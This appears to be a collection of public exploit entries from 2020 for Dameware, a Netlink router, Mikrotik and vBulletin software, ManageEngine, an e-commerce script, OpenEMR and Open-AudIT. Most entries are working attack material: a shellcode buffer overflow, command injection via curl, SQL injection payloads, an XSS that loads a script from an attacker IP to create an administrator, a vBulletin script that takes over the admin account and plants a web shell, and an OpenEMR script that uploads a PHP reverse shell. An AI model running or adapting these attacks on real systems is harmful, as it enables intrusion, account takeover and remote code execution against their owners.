# Exploit Title: Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH) # Exploit Author: gurbanli # Date: 2020-05-13 # Vulnerable Software: Solarwinds Dameware Remote Support 12.1.1.273 # Vendor Homepage: https://www.solarwinds.com/ # Version: 12.1.1.273 # Software Link: https://downloads.solarwinds.com/solarwinds/Release/DameWare/v12.1.1/DamewareRS-St.exe # Tested on: Windows 7 x86 """ poc 1. Run exploit and copy contents of payload.txt 2. Open Dameware Remote Support 3. Click Add active directory support 4. Write any ip address in name or ip address field 5. paste payload .txt content to display name field and click ok 6. Click ok when error pops up 7. Click Yes in dialog box 8. calc pops up Actually, i cant create this exploit with reliable exit, that's why calculator will be executed in background lol :D . but it is not big issue, the main thing is that arbitary code is executed """ file = open('payload.txt','w') max_length = 3604 padding_until_eax = '\x6e\x41' * 57 + '\x6e' align_eax = ( "\x41" # padding (one byte) "\x6e" # padding "\x05\x14\x11" # add eax,11001400 "\x6e" # padding "\x2d\x13\x11" # sub eax,11001300 ) ''' msfvenom -p windows/exec cmd=calc -f raw > shellcode.raw ./alpha2 eax --unicode --uppercase < shellcode.raw ''' shellcode = 'PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLYXDBKPM0KPS0TIYUNQGPC4TKPPNPDK0RLLTK0RMDTKT2MXLO870JNF01KOFLOLQQSLLBNLMP7Q8OLMM1I7YRL22227DKR2LP4KOZOLTKPLLQRX9SQ8KQHQPQTKPYMPKQJ34KOYLXK3NZQ94KP44KKQXV01KOVLGQ8OLMKQ7WOHIPSEKFM3CML8OKSMMTRUK428DKPXMTM1HSC6TKLLPKTK0XMLKQYCTKKTTKM18PSYPDMTMT1KQK1QPYQJPQKOYPQO1O1J4KLRJKTM1MRJM1DMDEVRKPKPKPPPS8NQTK2OE7KOXUGKJPVUW2PVBH76EEGMUMKO9EOLKV3LLJCPKKK0RULEGKOWLS42RO1ZKPQCKOXUS3QQRL33KPA' ''' ppr address 00b3007e (DNTU.exe) ''' nSEH = '\x61\x6e' # unicode compatible padding SEH = '\x7e\xb3' payload = 'A' * 1764 + nSEH + SEH + align_eax + padding_until_eax + shellcode payload += 'A' * (max_length-len(payload)) print('Payload length:{}'.format(len(payload))) file.write(payload) file.close()

# Exploit Title: Netlink XPON 1GE WiFi V2801RGW - Remote Command Execution # Google Dork: Not applicable # Date: 2020-05-13 # Exploit Author: Seecko Das # Vendor Homepage: https://www.crtindia.com/ # Version: V3.3.0-190627 # Tested on: Windows 10/Linux (Kali) # CVE: N/A Exploit : curl -L -d "target_addr=1.1.1.1+%7C+ls&waninf=1_INTERNET_R_VID_168" http://IPADDRESS/boaform/admin/formPing Response : <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!--ϵͳĬ��ģ��--> <html> <head> <title>PING���Խ��</title> <meta http-equiv=pragma content=no-cache> <meta http-equiv=refresh content="2"> <meta http-equiv=cache-control content="no-cache, must-revalidate"> <meta http-equiv=content-type content="text/html; charset=gbk"> <meta http-equiv=content-script-type content=text/javascript> <!--ϵͳ����css--> <style type=text/css> @import url(/style/default.css); </style> <!--ϵͳ�����ű�--> <script language="javascript" src="common.js"></script> </head> <!--------------------------------------------------------------------------------------> <!--��ҳ����--> <body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" alink="#000000" link="#000000" vlink="#000000"> <blockquote> <form> <div align="left" style="padding-left:20px;"><br> <div align="left"><b>Please wait</b> <br><br> </div> <pre> boa.conf web </pre> <input type=button value="back" onClick=window.location.replace("/diag_ping_admin.asp")> </div> </form> </blockquote> </body> </html>

# Exploit Title: Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection # Exploit Author: jul10l1r4 (Julio Lira) # Google Dork: N/A # Date: 2020-05-16 # Vendor Homepage: https://mikrotik.com # Software Link: https://mikrotik.com/download # Version: <= 1.2.3 # Tested on: Debian 10 buster # CVE: 2020-13118 Description: SQL Injection found in check_community.php:49 $community = $_GET['community']; $_SESSION['community'] = $community; $query = "SELECT name from router where `community`=' $community'"; PoC: http://localhost/check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(10)))Qaxg) AND 'sdHI'='sdHI SQLmap using: sqlmap -u 'http://localhost/check_community.php?community=1' --level=5 --risk=3

# Exploit Title: ManageEngine Service Desk 10.0 - Cross-Site Scripting # Date: 2020-05-14 # Exploit Author: Felipe Molina (@felmoltor) # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/service-desk/download.html # Version: 10.0 (10000.0.0.0) # Tested on: Windows 10 # CVE : CVE-2019-15083 [SPUK-2020-05/ManageEngine Service Desk XSS in remote IT Assets Management ]------------------------------ SECURITY ADVISORY: SPUK-2019-04/ManageEngine Service Desk XSS in remote IT Assets Management Affected Software: ManageEngine Service Desk Plus (version 10.0, installer version 10000.0.0.0, SHA1: 86EA684666CE85AF710CA9805B7FF37E3D4FD65D) Vulnerability: Cross-Site Scripting CVE: CVE-2019-15083 CVSSv3: 5.9 (CVSS:3.0/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N) Severity: Medium Release Date: 2020-05-14 I. Background ~~~~~~~~~~~~~ From ManageEngine's website: "ServiceDesk Plus is a game changer in turning IT teams from daily fire-fighting to delivering awesome customer service. It provides great visibility and central control in dealing with IT issues to ensure that businesses suffer no downtime. For 10 years and running, it has been delivering smiles to millions of IT folks, end users, and stakeholders alike. Version Enterprise: help desk + ITIL + asset + project The complete ITIL ready ITSM suite with all features that an IT service desk needs. * Incident management * Problem management * Change management * IT project management * Service catalog * Asset management * CMDB" II. Description ~~~~~~~~~~~~~~~ From wks administrator to Manage Engine Administrator: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default installations of "ManageEngine ServiceDesk Plus 10.0" were found to be vulnerable to a XSS injected by a workstation local administrator. Using the installed program names of the computer as a vector, the local administrator can execute JavaScript code on the Manage Engine ServiceDesk administrator side. On "Asset Home > Server > <workstation> > software" the administrator of ManageEngine can control what software is installed on the workstation. This table shows all the installed program names on the column "Software". In this field and probably in others, a remote attacker can inject malicious code in order to execute it when the ManageEngine admnistrator visualizes this page. In this case, the provided proof of concept creates a administrator user on ManageEngine Service Desk. PoC: ~~~~ 1. Access to the workstation managed by ManageEngine with a local administrator account. 2. Open regedit.exe as administrator 3. Navigate to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\<program>" 4. Change the current "DisplayName" to this value: test</a><script src=http://<attacker_ip>/addadmin.js type="text/javascript"/><a>bla 5. On the root of <attacker_ip> web server, deploy the file "addadmin.js" with this content: var createAdminParams= "sdpcsrfparam=<TOKEN>&mode=new&loginPermitted=null&loggedUserId=4&userID=-1&divToShow=listView&firstName=Legituser+4&middleName=L&lastName=Inocent+4&fullName=Legituser+4+L+Inocent+4&ciTypeId=6&ciId=null&employeeID=666&CI_BaseElement_IMPACTID=null&ciDescription=&ciName=Legituser+4+L+Inocent+4&email=&phone=&mobile=&smsID=&cost=0.00&deptName=None&reportingToid=&reportingTo=&jobTitle=&isSDSiteAdmin=false&associatedSites=null&projectrole=null&canApproveSR=false&approveLimitValue=&provideLogin=on&sdpAPIKey=&apiKeyExpiry=&userName=legituser4&addNewLogin=true&userPwd=legituser&confirmUserPwd=legituser&userDomain=None&isAdmin=SDAdmin&assignedRoles=2&dcRole=DCAdmin&froModuleForUDF=TECH&addButton=Save"; // Save the CSRF cookie into a variable var sdpcsrfcookie; carr = document.cookie.split(";"); for (i=0;i<carr.length;i++){ if (carr[i].split("=")[0].trim() == "sdpcsrfcookie"){ sdpcsrfcookie=carr[i].split("=")[1].trim(); } } if (sdpcsrfcookie === undefined){ console.log("No CSRF cookie was found. Aborting the PoC :-(") } else { var ajaxreq = new XMLHttpRequest(); ajaxreq.open('POST', '/TechnicianDef.do'); ajaxreq.withCredentials = true; ajaxreq.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml"); ajaxreq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); console.log("Creating a new user on Manage Engine with CSRF token: "+sdpcsrfcookie); // Update the CSRF token parameter with the token present in the user cookie params = createAdminParams.replace("<TOKEN>",sdpcsrfcookie); console.log("posting to create a new admin user: "+params); ajaxreq.send(params); } 6. Reboot the workstation to forthe the agent to update the program list. 7. Now, login as the administrator of ManageEngine SelfService. 8. Navigate to "Asset Home > Server > <workstation> > software" 9. Click on "Next" button until the software name is visualized on the table. 10. Now, go to "Admin > Users > Technicians" and verify that the administrator user "legituser4 " has been created. III. Impact ~~~~~~~~~~~ The XSS can be injected remotely from any workstation that is being managed by ManageEngine ServiceDesk with no need for the attacker to access the web application. This PoC shows the creation of an administrator of ManageEngine, but it can be potentially used to create Domain Admin users if the service is configured properly, therefore, compromising the whole domain where the workstation is in. CVSS 3.0 Score: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N IV. Remediation ~~~~~~~~~~~~~~~ Sanitize all the input from the remote agents before showing the values in the web page. Use typical XSS protection also for values that are not directly input on web formularies of the application. V. Disclosure ~~~~~~~~~~~~~ Reported By: Felipe Molina de la Torre (Felipe (at) SensePost.com) Vendor Informed: 2019-04-30 Patch Release Date: 2019-04-16 Publick Ack. of the vuln: 2020-05-13 Advisory Release Date: 2020-05-14 ---------------------------------[SPUK-2020-05/ManageEngine Service Desk XSS in remote IT Assets Management ]---

# Exploit Title: E-Commerce System 1.0 - Unauthenticated Remote Code Execution # Exploit Author: SunCSR (Sun* Cyber Security Research - ThienNV) # Date: 2020-05-14 # Vendor Homepage: https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/ecommerce.zip # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.5 # Description: E-Commerce System Using PHP/MySQLi - Unauthenticated Remote Code Execution + Unauthenticated SQL Injection ### Description: E-Commerce System Using PHP/MySQLi - Unauthenticated Remote Code Execution + Unauthenticated SQL Injection ###POC 1: Unauthenticated Remote Code Execution via Unrestricted file upload Vulnerabilities url: http://thiennv.com/ecommerce/index.php?q=profile Exploitation: POST /ecommerce/customer/controller.php?action=photos HTTP/1.1 Host: thiennv.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------270177040916945863071313890828 Content-Length: 4723 Origin: http://thiennv.com Connection: close Referer: http://thiennv.com/ecommerce/index.php?q=profile Cookie: advanced_ads_hide_deactivate_feedback=1; wplc_chat_status=5; _icl_current_language=en; nc_status=browsing; tcx_customerID=rJQlLlHFcU; wplc_cid=Bk4eLeHFcI_1589362760300; PHPSESSID=909kc73hdpc69l5vk6malipke7 Upgrade-Insecure-Requests: 1 -----------------------------270177040916945863071313890828 Content-Disposition: form-data; name="MAX_FILE_SIZE" 1000000 -----------------------------270177040916945863071313890828 Content-Disposition: form-data; name="photo"; filename="logo1.php" Content-Type: image/png ‰PNG IHDR á á m"H &PLTEÝ=1ÿÿÿ <?php phpinfo() ?> -----------------------------270177040916945863071313890828 Content-Disposition: form-data; name="savephoto" -----------------------------270177040916945863071313890828-- ###POC 2: Unauthenticated SQL Injection Vulnerabilities url: http://192.168.17.65:80/ecommerce/index.php?q=product&category=-2854' Exploitation: Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=-2854' OR 6075=6075# Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=' OR (SELECT 2158 FROM(SELECT COUNT(*),CONCAT(0x71706a7a71,(SELECT (ELT(2158=2158,1))),0x7170767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FBZp Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))dkZy)-- vkPi Type: UNION query Title: MySQL UNION query (NULL) - 20 columns Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7a71,0x644764427169434a594a57726f4a744c517a58554b59485152524842596454684f4d504d6d644868,0x7170767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# --- [11:22:17] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [11:22:17] [INFO] fetching database names available databases [6]: [*] db_ecommerce [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test -------------------------------------------------------------------------------------------------------------Best Regards! (*Mr) Ngo Van Thien*

# Exploit Title: vBulletin 5.6.1 - 'nodeId' SQL Injection # Date: 2020-05-15 # Exploit Author: Photubias # Vendor Advisory: [1] https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1 # Version: vBulletin v5.6.x (prior to Patch Level 1) # Tested on: vBulletin v5.6.1 on Debian 10 x64 # CVE: CVE-2020-12720 vBulletin v5.6.1 (SQLi) with path to RCE #!/usr/bin/env python3 ''' Copyright 2020 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. File name CVE-2020-12720.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) ##-->> Full creds to @zenofex and @rekter0 <<--## ''' import urllib.request, urllib.parse, sys, http.cookiejar, ssl, random, string ## Static vars; change at will, but recommend leaving as is sADMINPASS = '12345678' sCMD = 'id' sURL = 'http://192.168.50.130/' sUSERID = '1' sNEWPASS = '87654321' iTimeout = 5 ## Ignore unsigned certs ssl._create_default_https_context = ssl._create_unverified_context ## Keep track of cookies between requests cj = http.cookiejar.CookieJar() oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) def randomString(stringLength=8): letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(stringLength)) def getData(sUrl, lData): try: oData = urllib.parse.urlencode(lData).encode() oRequest = urllib.request.Request(url = sUrl, data = oData) return oOpener.open(oRequest, timeout = iTimeout) except: print('----- ERROR, site down?') sys.exit(1) def verifyBug(sURL,sUserid='1'): sPath = 'ajax/api/content_infraction/getIndexableContent' lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,"cve-2020-12720",8,7,6,5,4,3,2,1;--'} sResponse = getData(sURL + sPath, lData).read().decode() if not 'cve-2020-12720' in sResponse: print('[!] Warning: not vulnerable to CVE-2020-12720, credentials are needed!') return False else: print('[+] SQLi Success!') return True def takeoverAccount(sURL, sNEWPASS): sPath = 'ajax/api/content_infraction/getIndexableContent' ### Source: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720 ## Get Table Prefixes lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,table_name,8,7,6,5,4,3,2,1 from information_schema.columns WHERE column_name=\'phrasegroup_cppermission\';--'} sResponse = getData(sURL + sPath, lData).read().decode() if 'rawtext' in sResponse: sPrefix = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','').replace('language','') else: sPrefix = '' #print('[+] Got table prefix "'+sPrefix+'"') ## Get usergroup ID for "Administrators" lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,usergroupid,8,7,6,5,4,3,2,1 from ' + sPrefix + 'usergroup WHERE title=\'Administrators\';--'} sResponse = getData(sURL + sPath, lData).read().decode() sGroupID = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','') #print('[+] Administrators Group ID: '+sGroupID) ## Get admin data, including original token (password hash), TODO: an advanced exploit could restore the original hash in post exploitation lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,concat(username,0x7c,userid,0x7c,email,0x7c,token),8,7,6,5,4,3,2,1 from ' + sPrefix + 'user where usergroupid=' + sGroupID + ';--'} sResponse = getData(sURL + sPath, lData).read().decode() sUsername,sUserid,sUsermail,sUserTokenOrg = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','').split('|') #print('[+] Got original token (' + sUsername + ', ' + sUsermail + '): ' + sUserTokenOrg) ## Let's create a Human Verify Captcha sPath = 'ajax/api/hv/generateToken?' lData = {'securitytoken':'guest'} sResponse = getData(sURL + sPath, lData).read().decode() if 'hash' in sResponse: sHash = sResponse.split('hash')[1].split(':')[1].replace('}','').replace('"','') else: sHash = '' ## Get the captcha answer from DB sPath = 'ajax/api/content_infraction/getIndexableContent' lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,count(answer),8,7,6,5,4,3,2,1 from ' + sPrefix + 'humanverify limit 0,1--'} sResponse = getData(sURL + sPath, lData).read().decode() if 'rawtext' in sResponse: iAnswers = int(sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','')) else: iAnswers = 1 lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,answer,8,7,6,5,4,3,2,1 from ' + sPrefix + 'humanverify limit ' + str(iAnswers-1) + ',1--'} sResponse = getData(sURL + sPath, lData).read().decode() if 'rawtext' in sResponse: sAnswer = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','') else: sAnswer = '' ## Now request PW reset and retrieve the token sPath = 'auth/lostpw' lData = {'email':sUsermail,'humanverify[input]':sAnswer,'humanverify[hash]':sHash,'securitytoken':'guest'} sResponse = getData(sURL + sPath, lData).read().decode() sPath = 'ajax/api/content_infraction/getIndexableContent' lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,activationid,8,7,6,5,4,3,2,1 from ' + sPrefix + 'useractivation WHERE userid=' + sUserid + ' limit 0,1--'} sResponse = getData(sURL + sPath, lData).read().decode() if 'rawtext' in sResponse: sToken = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','') else: sToken = '' ## Finally the password reset itself sPath = 'auth/reset-password' lData = {'userid':sUserid,'activationid':sToken,'new-password':sNEWPASS,'new-password-confirm':sNEWPASS,'securitytoken':'guest'} sResponse = getData(sURL + sPath, lData).read().decode() if not 'Logging in' in sResponse: print('[-] Failed to reset the password') return '' else: print('[+] Success! User ' + sUsername + ' now has password ' + sNEWPASS) return sUserid def createBackdoor(sURL, sADMINPASS, sUserid='1'): ## Activating Sitebuilder sPath = 'ajax/activate-sitebuilder' lData = {'pageid':'1', 'nodeid':'0','userid':'1','loadMenu':'false', 'isAjaxTemplateRender':'true', 'isAjaxTemplateRenderWithData':'true','securitytoken':'1589477194-0e3085507fb50fc1631610a28e045c5fa71a2a12'} oResponse = getData(sURL + sPath, lData) if not oResponse.code == 200: print('[-] Error activating sitebuilder') sys.exit(1) ## Confirming the password, getting new securitytoken sPath = 'auth/ajax-login' lData = {'logintype':'cplogin','userid':sUserid,'password':sADMINPASS,'securitytoken':'1589477194-0e3085507fb50fc1631610a28e045c5fa71a2a12'} oResponse = getData(sURL + sPath, lData) sResponse = oResponse.read().decode() if 'lostpw' in sResponse: print('[-] Error: authentication for userid ' + sUserid + ' failed') sys.exit(1) sToken = sResponse.split(',')[1].split(':')[1].replace('"','').replace('}','') print('[+] Got token: '+sToken) ## cpsession is needed, use this for extra verification #for cookie in cj: print(cookie.name, cookie.value, cookie.domain) #etc etc ## First see if our backdoor does not already exists sPath = 'ajax/render/admin_sbpanel_pagelist_content_wrapper' lData = {'isAjaxTemplateRenderWithData':'true','securitytoken':sToken} oResponse = getData(sURL + sPath, lData) sResponse = oResponse.read().decode() if 'cve-2020-12720' in sResponse: sPageName = 'cve-2020-12720-' + sResponse.split('/cve-2020-12720-')[1].split(')')[0] print('[+] This machine was already pwned, using "' + sPageName + '" for your command') return sPageName ## Create a new empty page sPath = 'ajax/api/widget/saveNewWidgetInstance' lData = {'containerinstanceid':'0','widgetid':'23','pagetemplateid':'','securitytoken':sToken} oResponse = getData(sURL + sPath, lData) sResponse = oResponse.read().decode() sWidgetInstanceID = sResponse.split(',')[0].split(':')[1].replace('}','') sPageTemplateID = sResponse.split(',')[1].split(':')[1].replace('}','') print('[+] Got WidgetInstanceID: '+sWidgetInstanceID+' and PageTemplateID: '+sPageTemplateID) ## Now submitting the page content sPageName = 'cve-2020-12720-'+randomString() sPath = 'ajax/api/widget/saveAdminConfig' lData = {'widgetid':'23', 'pagetemplateid':sPageTemplateID, 'widgetinstanceid':sWidgetInstanceID, 'data[widget_type]':'', 'data[title]':sPageName, 'data[show_at_breakpoints][desktop]':'1', 'data[show_at_breakpoints][small]':'1', 'data[show_at_breakpoints][xsmall]':'1', 'data[hide_title]':'0', 'data[module_viewpermissions][key]':'show_all', 'data[code]':"echo('###SHELLRESULT###');system($_GET['cmd']);echo('###SHELLRESULT###');", 'securitytoken':sToken} oResponse = getData(sURL + sPath, lData) if not oResponse.code == 200: print('[!] Error submitting page content for ' + sPageName) ## Finally saving the new page sPath = 'admin/savepage' lData = {'input[ishomeroute]':'0', 'input[pageid]':'0', 'input[nodeid]':'0', 'input[userid]':'1', 'input[screenlayoutid]':'2', 'input[templatetitle]':sPageName, 'input[displaysections[0]]':'[{"widgetId":"23","widgetInstanceId":"' + sWidgetInstanceID + '"}]', 'input[displaysections[1]]':'[]', 'input[displaysections[2]]':'[]', 'input[displaysections[3]]':'[]', 'input[pagetitle]':sPageName, 'input[resturl]':sPageName, 'input[metadescription]':'Photubias+Shell', 'input[pagetemplateid]':sPageTemplateID, 'url':sURL, 'securitytoken':sToken} oResponse = getData(sURL + sPath, lData) if not oResponse.code == 200: print('[!] Error saving page content for ' + sPageName) return sPageName def main(): if len(sys.argv) == 1: print('[!] No arguments found: python3 CVE-2020-12720.py <URL> <CMD>') print(' Example: ./CVE-2020-12720.py http://192.168.50.130/ "cat /etc/passwd"') print(' But for now, ask questions then') sURL = input('[?] Please enter the address and path to vBulletin ([http://192.168.50.130/): ') if sURL == '': sURL = 'http://192.168.50.130' else: sURL = sys.argv[1] sCMD = sys.argv[2] if not sURL[:-1] == '/': sURL += '/' if not sURL[:4].lower() == 'http': sURL = 'http://' + sURL print('[+] Welcome, first verifying the SQLi vulnerability') if verifyBug(sURL): print("----\n" + '[+] Attempting automatic admin account takeover') sUSERID = takeoverAccount(sURL, sNEWPASS) sADMINPASS = sNEWPASS if sUSERID == '': sUSERID = '1' sADMINPASS = input('[?] Please enter the admin password (userid ' + sUSERID + '): ') else: sADMINPASS = input('[?] Please enter the admin password (userid ' + sUSERID + '): ') print("----\n"+'[+] So far so good, attempting the creation of the backdoor') sPageName = createBackdoor(sURL, sADMINPASS, sUSERID) if len(sys.argv) == 1: sCMD = input('[?] Please enter the command to run [id]: ') if sCMD == '': sCMD = 'id' sCmd = urllib.parse.quote(sCMD) sPath = sPageName + "?cmd=" + sCmd print('[+] Opening '+sURL + sPath) try: oRequest = urllib.request.Request(url = sURL + sPath) oResponse = oOpener.open(oRequest, timeout = iTimeout) print('#######################') sResponse = oResponse.read().decode() print('[+] Command result:') print(sResponse.split('###SHELLRESULT###')[1]) except: print('[-] Something went wrong, bad command?') sys.exit(1) if __name__ == "__main__": main()

# Title: OpenEMR 5.0.1 - Remote Code Execution (1) # Exploit Author: Musyoka Ian # Date: 2020-05-25 # Title: OpenEMR < 5.0.1 - Remote Code Execution # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz # Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile # Version: < 5.0.1 (Patch 4) # Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3 # References: https://medium.com/@musyokaian/openemr-version-5-0-1-remote-code-execution-vulnerability-2f8fd8644a69 # openemr_exploit.py #!/usr/bin/env python2 # -*- coding: utf-8 -*- import requests import time auth = "[+] Authentication with credentials provided please be patient" upload = "[+] Uploading a payload it will take a minute" netcat = "[+] You should be getting a shell" s = requests.Session() payload = {'site': 'default', 'mode' : 'save', 'docid' : 'shell.php', 'content' : """<?php set_time_limit (0); $VERSION = "1.0"; $ip = '127.0.0.1'; # CHANGE THIS $port = 9001; # CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; // // Daemonise ourself if possible to avoid zombies later // // pcntl_fork is hardly ever available, but will allow us to daemonise // our php process and avoid zombies. Worth a try... if (function_exists('pcntl_fork')) { // Fork and have the parent process exit $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); // Parent exits } // Make the current process a session leader // Will only succeed if we forked if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } // Change to a safe directory chdir("/"); // Remove any umask we inherited umask(0); // // Do the reverse shell... // // Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } // Spawn shell process $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { // Check for end of TCP connection if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } // If we can read from the process's STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print "$string\n"; } } ?> """} print (auth) url = "http://localhost/openemr/interface/main/main_screen.php?auth=login&site=default" data= { 'new_login_session_management' : '1', 'authProvider' : 'Default', 'authUser' : 'admin', # change this to the the appropriate username 'clearPass' : 'password123', # change this to the appropriate password 'languageChoice' : '1', } response = s.post(url, data=data,).text time.sleep(2) print (upload) time.sleep(2) resp = s.post("http://localhost/openemr/portal/import_template.php?site=default", data = payload) time.sleep(2) print (netcat) rev_shell = s.get("http://localhost/openemr/portal/shell.php") print (rev_shell.text)

# Exploit Title: Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated) # Date: 2020-04-26 # Exploit Author: Kamaljeet Kumar # Vendor Homepage: https://opmantek.com/network-discovery-inventory-software/ # Software Link: https://www.open-audit.org/downloads.php # Version: 3.3.0 # CVE : CVE-2020-12261 # POC: Step 1: Login to Open-Audit Step 2: Go to "http://192.168.0.4/open-audit/index.php/search/" and add this "<svg><animate onend=alert(1) attributeName=x dur=1s>" payload after the search, the URL look like: http://192.168.0.4/open-audit/index.php/search/<svg><animate onend=alert(1) attributeName=x dur=1s> Then we get the XSS pop up.

